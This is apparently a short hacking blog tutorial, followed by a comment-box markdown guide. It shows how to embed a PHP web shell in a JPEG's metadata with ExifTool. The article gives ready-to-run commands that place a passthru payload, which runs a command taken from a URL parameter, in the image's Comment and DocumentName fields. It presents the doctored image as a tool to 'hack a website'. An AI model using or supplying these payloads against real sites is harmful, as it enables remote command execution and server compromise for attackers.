Hide Payload/Malicious Code in Image File Using ExifTool
Hello hackers, in this article I’m going to show how to hide a payload in an image file using ExifTool. Let’s see:
Table of Contents
At first, we need to install ExifTool. You can download and install it from exiftool.org. If you need help regarding installation, please comment below. I’ll try to help.
Take an Image
Let’s take an image file to inject a payload. I’ve taken an image named flower.jpg. I’ll set the payload in this file.
Before injecting malicious code, let’s take a look at the metadata of the image file. Run this command:
Open terminal from your image file location and run this command:
exiftool -comment='<?php passthru(\$_GET'cmd'); _halt_compiler(); ?>' flower.jpg
Now check metadata using
exiftool flower.jpg command:
We can also set payload in the “Document Name” meta field. To do this, run this command:
exiftool -documentname='<?php passthru(\$_GET'cmd'); _halt_compiler(); ?>' flower.jpg
We have successfully hidden the malicious code in an image file. Using this image file, we can try to hack a website.
That’s it. Thanks for reading. 🙂
Preview may take a few seconds to load.
Below you will find some common used markdown syntax. For a deeper dive in Markdown check out this Cheat Sheet
Bold & Italic
Bold **double asterisks**
Three back ticks and then enter your code blocks here.
# This is a Heading 1
## This is a Heading 2
### This is a Heading 3
> type a greater than sign and start typing your quote.
You can add links by adding text inside of  and the link inside of (), like so:
To add a numbered list you can simply start with a number and a ., like so:
1. The first item in my list
For an unordered list, you can add a dash -, like so:
- The start of my list
You can add images by selecting the image icon, which will upload and add an image to the editor, or you can manually add the image by adding an exclamation !, followed by the alt text inside of , and the image URL inside of (), like so:
To add a divider you can add three dashes or three asterisks:
--- or ***